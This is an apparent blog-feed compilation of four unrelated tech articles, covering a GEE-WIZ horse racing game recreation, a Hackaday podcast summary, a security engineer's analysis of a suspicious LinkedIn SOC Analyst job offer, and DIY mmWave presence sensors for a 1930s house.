You have to admire the lengths designers went to back in the day to create engaging games and toys. One particularly clever game of this type was called GEE-WIZ, a horse racing game from the 1920s that seems like it might have been right at home at a bar or pub, and that caught [Michael Gardi]’s imagination enough that he built a modern version of the game.

GEE-WIZ imitates a horse race with an extremely clever mechanism powered by a flywheel on a square shaft. Play is started by pulling a ripcord, which spins up the flywheel to shoot steel balls up six tracks in a gently sloped playing field. The balls hit tin horses riding in each track, pushing them ever further up the track until they trip a flag to indicate the winner. We can practically hear the cheers.

As with many of his other retro-reimaginings, [Mike]’s 21st-century version of GEE-WIZ focuses on capturing the look and feel of the original as accurately as possible. To that end, he put a lot of work into the 3D prints that form the playing field, as well as labels that adorned the original. But the game wouldn’t be much good without the drive mechanism, so [Mike] had to put some work into reverse-engineering the flywheel. He had that machined out of stainless steel and mounted it to the base with some chunky printed bearing blocks. You can see the final product in the brief video below.

[Mike] says that vintage toy recreations aren’t exactly his usual fare, but some might argue that the Sol-20 and Minivac 601 very much count as toys. Either way, we really like the simplicity of GEE-WIZ and the quality of [Mike]’s reproduction.



hackaday.com/2025/04/18/vintag…


Hackaday Podcast Episode 317: Quantum Diamonds, Citizen Science, and Cobol to AI


When Hackaday editors Elliot Williams and Al Williams need a break from writing posts, they hop on the podcast and talk about their favorite stories of the past week. Want to know what they were talking about? Listen in below and find out!

In an unusual twist, a listener sent in the sound for this week’s What’s This Sound competition, so it turns out Elliot and Al were both stumped for a change. See if you can do better, and you might just score a Hackaday Podcast T-shirt.

On the hacking front, the guys talked about what they hope to see as entries in the pet hacking contest, quantum diamonds (no kidding), spectrometers, and several science projects.

There was talk of a tiny robot, a space mouse—the computer kind, not a flying rodent—and even an old-fashioned photophone that let Alexander Graham Bell use the sun like a string on a paper cup telephone.

Things really heat up at the end, when there is talk about computer programming ranging from COBOL to Vibe programming. In case you’ve missed it, vibe coding is basically delegating your work to the AI, but do you really want to? Maybe, if your job is to convert all that old COBOL code.

Want to read along? The links are below. Be sure to leave your robot plans, COBOL war stories, and AI-generated Vibe limericks in the comments!

As always, the human-generated Hackaday Podcast is available as a DRM-free MP3 download.

hackaday.com/2025/04/18/hackad…


AAA SOC Analyst wanted: when job offers are unclear and non-transparent and you need to be careful


Author: Nicola Tarlini, Cyber Security Engineer

Nicola sent us a detailed report about a suspicious communication relating to a job offer for the position of SOC Analyst and wanted to share his observations with an analysis of the facts. We should note first that, especially in the field of cyber security, particular attention must be paid to unclear, non-transparent job offers, even when they are not a scam, above all because cyber security is a critical sector and companies in the field need to attract highly qualified talent to face increasingly complex and frequent threats.

In the first case, unclear or ambiguous job offers, with unverifiable contacts or contradictory information, should raise the level of attention, as Nicola Tarlini did. These adverts can often conceal risks of fraud, theft of personal data or security breaches: Nicola asked for clarity both to protect his professional and digital integrity and to avoid falling victim to possible fraud.

In the lesser of evils, offers that are not transparent or are superficial may indicate a lack of professionalism or attention, or a poorly managed hiring process and staff preparation, with the consequent risk of ending up in insecure or unreliable environments that can compromise one's career and personal security. Here too Nicola's report aims to shed light. In his analysis he highlights several warning signs, including impersonal and generic messages, unverifiable recruiter identities, lack of clear information, phone contacts that nobody answers or that are not active, discrepancies between the job advert and the subsequent contact messages and, finally, an official reply from the company that admits unclear communication but confirms that the contacts are genuine.

Below is a table summarizing the suspicious characteristics of a job offer, largely consistent with Nicola's analysis that follows.

Nicola Tarlini's analysis of a job offer for a generic SOC Analyst


A few days ago, the account of a LinkedIn user with the role “recruiter” contacted me with a job proposal as a generic “SOC Analyst”, both 8×5 and 24×7 on shifts.

The user in question, whose identity I am hiding for privacy reasons, contacted me with the following message:
Image: First contact
In this message I immediately noticed some warning signs, which I list below:

  1. The message opens with an aseptic and impersonal “Buongiorno!” (“Good morning!”). This suggests it is an automatic or pre-set message, not a personal message following a careful analysis of my profile.
  2. The user presents themselves with an identity different from the one they write with: “Nice to meet you! I'm Anna, a colleague of [NAME REDACTED].” This leads to two possible hypotheses:
    • a. The account is compromised: in which case a computer crime has been committed;
    • b. The account is shared: in which case no security standard regarding online communications is respected, hence a violation of LinkedIn's rules of conduct and corporate procedures that do not comply with national and international laws and standards.


  3. In the message in point 2 the surname of this alleged recruiter named “Anna” is not given. This suggests that the user does not want to identify themselves and, therefore, that option 2.a is the more likely.
  4. The user states “we are [COMPANY REDACTED]”, not qualifying personally as a recruiter on behalf of the company, i.e. an employee; the suspicions remain and the alarm stays active as to who “Anna” is.
  5. The job title the user appears to be recruiting for in the reported message is “SOC Analyst (H8 and H24, level 1 and 2)”, but it differs from what is presented on the company LinkedIn profile used for the contact. Moreover, the advert has been up for 2 months. This information suggests that the user in question has been unable to find the right person after all this time. One also wonders whether the advert, unlike the chat message, has not been updated.


Image: Job offer on the company LinkedIn profile
  6. It says “The position is contract-based with a hybrid workplace type, located in Milan”. The contract type is not defined: agency, fixed-term, permanent, on-call or other.

  7. The signature does not mention “Anna” but reads “on behalf of”. This once again confirms the suspicions of point 2.


So, given how suspicious the first message was, I decided to ask for some way to confirm the identity:
Image: Subsequent and final messages
The outcome of verifying this data was very disappointing and raised my suspicions further:

  1. The landline number rang out and I received no answer, despite 4 attempts between 3:48 p.m. and 4:07 p.m. (Italian time).
  2. The mobile number is instead not active;
  3. The e-mail address contains a “surname” that does not match, or cannot be verified against, the data provided earlier in the LinkedIn chat.

Wanting to dig further, I verified that the user was trying to present themselves with the identity of “Anna [REDACTED]”. She turns out to be a Junior Recruiter working at the company named in the job advert and during the contact. This young woman appears to have completed, a few days earlier, a master's course with an Academy specific to recruiters, and appears to have advertised, a week earlier, the position for which I was contacted.

This leads me to believe that the company in question does not provide Security training to its recruiters and, therefore, does not comply with national and international laws in this area. The address “privacv@[REDACTED].it” was contacted to report everything and ask for further confirmation of this suspicious behaviour, and the reply was the following:

The article AAA SOC Analyst wanted: when job offers are unclear and non-transparent and you need to be careful comes from il blog della sicurezza informatica.


Presence Detection Augments 1930s Home


It can be jarring to see various sensors, smart switches, cameras, and other technology in a house built in the 1930s, like [Chris]’s was. But he still wanted presence detection so as to not stub any toes in the dark. The result is a sensor that blends in with the home’s aesthetics a bit better than anything you’re likely to find at the Big Box electronics store.

For the presence detection sensors, [Chris] chose to go with 24 GHz mmWave radar modules that, unlike infrared sensors, can detect whether a human is in an area even if they are incredibly still. Paired with the diminutive ESP32-S2 Mini, each pair takes up very little real estate on a wall.

Although he doesn’t have a 3D printer to really pare down the size of the enclosure to the maximum, he found pre-made enclosures instead that are fairly inconspicuous on the wall. Another design goal here was to make sure that everything was powered so he wouldn’t have to perpetually change batteries, so a small wire leads from the prototype unit as well.

The radar module and ESP pair are set up with some code to get them running in Home Assistant, which [Chris] has provided on the project’s page. With everything up and running he has a module that can control lights without completely changing the aesthetic or behavior of his home. If you’re still using other presence sensors and are new to millimeter wave radar, take a look at this project for a good guide on getting started with this fairly new technology.


hackaday.com/2025/04/18/presen…